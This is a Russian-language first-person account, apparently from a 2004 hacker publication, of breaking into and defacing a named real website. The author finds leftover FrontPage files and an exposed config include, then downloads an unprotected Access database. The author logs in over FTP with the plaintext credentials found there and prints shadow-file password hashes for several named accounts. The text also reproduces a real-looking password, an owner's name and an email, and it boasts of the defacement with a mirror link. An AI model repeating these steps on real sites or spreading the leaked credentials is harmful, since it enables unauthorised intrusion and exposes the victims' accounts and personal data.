На днях разбираясь с новой уязвимостью, обнаруженной в a.shopKart, я наткнулся
на сайт www.surving.com.
Меня он сразу не заинтересовал, так как стоял на Apache/1.3.29 под *nix и к
самой уязвимости a.shopKart не мог иметь отношения,
хотя в директории /fpdb/ и лежала пустая база scart.mdb.
Пробежавжись взглядом по доступной для просмотра директории /fpdb/ я понял, что админ перенеc сайт с
M$ на *nix довольно криво, в директории лежали файлы с
.asp расширениями. Решив не отвлекаться от поставленной задачи, я просто загрузил url сайта в DCS и
стал дальше искать в поисковике магазины с a.shopKart.
Ход 1. Е2 - Е4.
Где-то через полчаса я посмотрел результаты сканирования и еще раз убедился, что
сайт был сваян на FrontPage для ISS, об этом говорила целая куча фронтпаговских файлов непонятно для
чего оставленных админом:
www.surving.com/_private/form_results.txt
www.surving.com/_vti_bin/_vti_aut/author.exe
www.surving.com/_vti_bin/fpcount.exe
www.surving.com/_vti_bin/shtml.dll
www.surving.com/_vti_bin/shtml.exe
www.surving.com/_vti_cnf/
www.surving.com/_vti_pvt/access.cnf
www.surving.com/_vti_pvt/botinfs.cnf
www.surving.com/_vti_pvt/bots.cnf
www.surving.com/_vti_pvt/doctodep.btr
www.surving.com/_vti_pvt/linkinfo.cnf
www.surving.com/_vti_pvt/service.cnf
www.surving.com/_vti_pvt/services.cnf
www.surving.com/_vti_pvt/structure.cnf
www.surving.com/_vti_pvt/svcacl.cnf
www.surving.com/_vti_pvt/writeto.cnf
Мое внимание сразу привлек другой файл:
http://www.surving.com/admin/CONNECT.INC
Открыв его я увидел:
%
Function Connect ()
Set DB = Server.CreateObject("ADODB.Connection")
ConnStr = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" +
Server.MapPath("..\database\Users.mdb")
DB.Open (ConnStr)
Set Connect = DB
End Function
%
Ход 2. Е4 - Е5.
Увидев в файле CONNECT.INC строку \database\Users.mdb я решил проверить наличие этой базы.
Она оказалась на месте:
http://www.surving.com/database/Users.mdb и браузер предложил ее загрузить.
В базе оказалась только одна таблица Login с единственной записью:
Username Password FirstName LastName Email
surving iguana Surving Studios Rachel surving@warwick.net
Ход 3. Шах! и Мат!
Не особо надеясь на удачу я попытался зайти по ftp используя этот логин/пароль.
Меня пустили! Когда я стал оглядываться, то понял, что похоже даже под root'om, файл shadow был открыт для чтения:
richard:ltzn5V4JhD8pk:::::::
sales:PV9h7/myEtzqM:::::::
admin:ZTVcKxDV/N1Tg:::::::
info:9fqrLq7CFPDLY:::::::
forward:aydjIfX8.rKv2:::::::
webmaster:jluzsHKAEKniI:::::::
natalie:kjjb5BJl1nMqA:::::::
Понятно, что с такими привилегиями заменить index.html уже ничего не стоило.
Зеркало:
http://taxidermia.void.ru/mirrors/2004/03/30/www.surving.com
